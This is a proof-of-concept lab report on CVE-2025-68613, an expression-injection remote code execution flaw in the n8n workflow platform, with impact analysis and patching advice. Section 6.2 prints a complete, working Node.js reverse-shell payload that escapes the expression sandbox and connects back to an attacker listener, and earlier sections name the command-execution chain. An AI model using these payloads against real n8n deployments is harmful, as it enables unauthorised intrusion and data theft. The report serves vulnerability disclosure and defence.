CVE-2025-68613: n8n RCE - POC Report

Executive Summary

This report documents the successful exploitation of CVE-2025-68613, a critical Remote Code Execution (RCE) vulnerability in n8n workflow automation platform (CVSS 9.9). The vulnerability allows authenticated users to execute arbitrary system commands through expression injection in the workflow editor, leading to full container compromise and reverse shell access.

Key Findings:

RCE Achieved: System command execution via JavaScript expression injection

Container Escape: Interactive reverse shell established

Data Exposure: Access to sensitive files (SSL certificates)

Complete Compromise: Full container control demonstrated

CVSS 9.9 Validated: Critical impact confirmed

1. Vulnerability Overview

1.1 Vulnerability Details

CVE ID: CVE-2025-68613

CVSS Score: 9.9 (Critical)

Affected Versions: n8n 0.211.0 through 1.120.3

Patched Versions: n8n 1.120.4, 1.121.1, 1.122.0

Vulnerability Type: Expression Injection → Remote Code Execution

1.2 Technical Description

The vulnerability exists in n8n's workflow expression evaluation system. User input wrapped in double curly braces {{ }} is evaluated as JavaScript code without proper sandboxing, allowing authenticated users to escape the expression context and access Node.js runtime objects, including the child_process module for system command execution.

2. Lab Environment & Vulnerable Deployment

2.1 System Configuration

Host OS: Kali Linux 2025.4

Virtualization: VMware Workstation

Network: Bridged mode

User Account: kali (non-privileged)

2.2 Docker Installation

#1: Docker Environment Verification

2.3 Configuration File

#2: Docker Compose File Created

2.4 Deployment Process

#3: Starting n8n Container

#4: n8n Running Confirmation

3. Authentication & Initial Access

3.1 Application Access

#5: Owner Account Setup

URL: http://localhost:5678

3.2 Dashboard Access

#6: Main n8n Interface

Successful login to n8n dashboard

Fresh instance with zero executions

4. Basic Exploitation Demonstration

4.1 Workflow Creation

#7: Creating Workflow

Clicked "Start from scratch" → Blank workflow canvas displayed

#8: Adding Manual Trigger

Searched for "manual" in node search → Selected "Manual Trigger" node → .Node added to workflow

#9: Adding Edit Fields Node

Connected to Manual Trigger node → Searched for "set" in node search → Selected "Edit Fields (Set)" node for payload injection

4.2 Payload Injection & Execution

#10: EXPLOIT PAYLOAD ENTERED (CRITICAL)

Payload Breakdown:

{{ }} - n8n expression evaluation markers

this.process.mainModule - Escape sandbox to Node.js global context

require('child_process') - Load system command module

execSync('id') - Execute system command

.toString() - Return command output

#11: COMMAND EXECUTION RESULTS (CRITICAL)

Running as node user inside Docker container

5. File System & System Reconnaissance

5.1 File System Access

#12: FILE SYSTEM ACCESS

5.2 System Information

#13: OS INFO AND DISK USAGE

Container OS (Alpine Linux) and resource monitoring

6. Reverse Shell & Container Control

6.1 Attack Infrastructure

Kali Host IP: 192.168.100.93

Listening Port: 1337

Container Network: 172.18.0.0/16 (Docker bridge)

#14a: Network Configuration

#14b: Netcat Listener Preparation

6.2 Reverse Shell Payload

#14c: Payload Used:

Full Payload:

{{ (function(){
    var net = this.process.mainModule.require("net"),
        cp = this.process.mainModule.require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();

    client.connect(1337, "192.168.100.93", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
})() }}

Payload Analysis:

Dual Module Loading: net + child_process modules

Interactive Shell: /bin/sh spawned with full TTY

Socket Programming: Persistent TCP connection establishment

Stream Piping: Bidirectional I/O for interactive session

6.3 Shell Acquisition

#14d: REVERSE SHELL CONNECTION ESTABLISHED

Connection from container (172.18.0.2) to attacker (192.168.100.93)

6.4 Post-Exploitation Activities

#14e: INTERACTIVE COMMAND EXECUTION

Confirmed:

Interactive shell as node user

Container OS: Alpine Linux 3.22.2

n8n process running as PID 7

Full container control achieved

7. Impact Analysis

7.1 Attack Vector Summary

															Authenticated User Access
																			    ↓
																	Workflow Creation
																			    ↓
											Expression Injection ({{ malicious_code }})
																			    ↓
											Sandbox Escape (this.process.mainModule)
																			    ↓
											Module Loading (require('child_process'))
																					↓
															System Command Execution
																			    ↓
														Reverse Shell Establishment
																			    ↓
														Full Container Compromise

7.2 Technical Impact Assessment

Capability	Demonstrated	Impact Level
Command Execution	id, whoami, find	High
File System Access	SSL certificates discovery	Critical
Process Control	View running processes	High
Interactive Shell	Reverse shell with TTY	Critical
Network Access	Outbound connections	High
Data Exfiltration	File reading capabilities	Critical

7.3 CVSS 9.9 Justification

Attack Vector: Network (authenticated web access)

Attack Complexity: Low (simple expression injection)

Privileges Required: Low (any authenticated user)

User Interaction: None

Scope: Changed (container escape achieved)

Confidentiality Impact: High (full file system access)

Integrity Impact: High (arbitrary command execution)

Availability Impact: High (process control, container compromise)

8. Cleanup

#15: CLEANUP PROCESS

9. Security Recommendations

9.1 For n8n Administrators

Priority 1: Update all instances to n8n ≥ 1.120.4 immediately

Priority 2: Review and audit all existing workflows for malicious expressions

Priority 3: Implement network-level isolation for n8n deployments

Priority 4: Enable detailed logging of workflow executions

9.2 Configuration Hardening

environment:
  - N8N_BLOCK_ENV_ACCESS_IN_NODE=true
  - N8N_EXTERNAL_SECURE_FILES_ENABLED=false
  - N8N_SECURITY_AUDIT_LOGGING_ENABLED=true

10. Conclusion

10.1 Technical Validation Conclusion

The technical assessment confirms CVE-2025-68613 as a critical expression injection vulnerability leading to remote code execution in n8n workflow automation platform. Testing validated that the insufficient sandbox isolation in n8n's expression evaluation system allows authenticated users to access Node.js runtime objects, specifically the child_process module, enabling arbitrary command execution on the underlying container. The vulnerability was successfully exploited through multiple vectors, progressing from basic command execution to comprehensive file system access and ultimately establishing a persistent reverse shell session. These findings substantiate the CVSS 9.9 rating, demonstrating both low attack complexity and high impact across confidentiality, integrity, and availability domains.

10.2 Attribution & Disclosure

Author: Omar Khadrawi

Affiliation: Skidz.io

Testing Information:

Test Date: December 27-28, 2025

Environment: Isolated Kali Linux VM

Purpose: Educational security research

Authorization: Conducted with proper lab environment controls

Disclosure: This POC demonstrates the critical need for prompt patching